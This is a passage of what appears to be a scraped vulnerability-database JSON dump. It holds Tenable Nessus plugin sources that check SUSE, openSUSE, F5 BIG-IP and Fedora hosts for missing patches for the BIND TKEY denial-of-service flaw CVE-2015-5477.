SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85179);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"SUSE SLES10 Security Update : bind (SUSE-SU-2015:1322-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bind was updated to fix one security issue :\n\nCVE-2015-5477: Remote Denial-of-Service via TKEY queries. (bsc#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n # https://download.suse.com/patch/finder/?keywords=fe704ff20633640972645403977f8036\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb419a45\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151322-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?915b47dd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-chrootenv-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-devel-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-doc-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-libs-9.6ESVR11P1-0.14.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-utils-9.6ESVR11P1-0.14.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:07:03", "description": "An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit. (CVE-2015-5477)", "cvss3": {"score": null, "vector": null}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : BIND vulnerability (K16909)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-01-04T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL16909.NASL", "href": "https://www.tenable.com/plugins/nessus/86011", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K16909.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86011);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"F5 Networks BIG-IP : BIND vulnerability (K16909)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An error in the handling of TKEY queries can be exploited by an\nattacker for use as a denial-of-service vector, as a constructed\npacket can use the defect to trigger a REQUIRE assertion failure,\ncausing BIND to exit. (CVE-2015-5477)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16909\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K16909.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K16909\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.4.0-11.5.3\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.3\",\"10.1.0-10.2.4\",\"11.6.0\",\"11.2.0-11.5.3\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\",\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\",\"11.2.1HF15\",\"11.0.0-11.1.0\",\"10.1.0-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.3\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF6\",\"11.5.4\",\"11.5.3HF2\",\"11.4.1HF9\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.1.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF9\",\"11.2.1HF15\",\"10.2.4HF12\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.2.4HF12\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF15\",\"10.2.4HF12\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:06", "description": "bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\nExposure to this issue can not be prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bind (openSUSE-2015-530)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bind", "p-cpe:/a:novell:opensuse:bind-chrootenv", "p-cpe:/a:novell:opensuse:bind-debuginfo", "p-cpe:/a:novell:opensuse:bind-debugsource", "p-cpe:/a:novell:opensuse:bind-devel", "p-cpe:/a:novell:opensuse:bind-libs", "p-cpe:/a:novell:opensuse:bind-libs-32bit", "p-cpe:/a:novell:opensuse:bind-libs-debuginfo", "p-cpe:/a:novell:opensuse:bind-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bind-lwresd", "p-cpe:/a:novell:opensuse:bind-lwresd-debuginfo", "p-cpe:/a:novell:opensuse:bind-utils", "p-cpe:/a:novell:opensuse:bind-utils-debuginfo", "cpe:/o:novell:opensuse:13.1", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2015-530.NASL", "href": "https://www.tenable.com/plugins/nessus/85187", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-530.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85187);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"openSUSE Security Update : bind (openSUSE-2015-530)\");\n script_summary(english:\"Check for the openSUSE-2015-530 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bind was updated to fix one security issue.\n\nThis security issue was fixed :\n\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\nExposure to this issue can not be prevented by either ACLs or\nconfiguration options limiting or denying service because the\nexploitable code occurs early in the packet handling.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=939567\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-lwresd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-lwresd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-chrootenv-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-debuginfo-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-debugsource-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-devel-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-libs-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-libs-debuginfo-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-lwresd-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-lwresd-debuginfo-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-utils-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"bind-utils-debuginfo-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"bind-libs-debuginfo-32bit-9.9.4P2-2.14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-chrootenv-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-debuginfo-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-debugsource-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-devel-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-libs-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-libs-debuginfo-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-lwresd-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-lwresd-debuginfo-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-utils-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-utils-debuginfo-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-2.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bind-libs-debuginfo-32bit-9.9.6P1-2.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chrootenv / bind-debuginfo / bind-debugsource / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:16", "description": "Update to 9.10.2-P3 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-03T00:00:00", "type": "nessus", "title": "Fedora 22 : bind-9.10.2-4.P3.fc22 (2015-12335)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bind", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-12335.NASL", "href": "https://www.tenable.com/plugins/nessus/85170", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-12335.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85170);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"FEDORA\", value:\"2015-12335\");\n\n script_name(english:\"Fedora 22 : bind-9.10.2-4.P3.fc22 (2015-12335)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 9.10.2-P3 to fix CVE-2015-5477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1247361\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163006.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5e330efe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 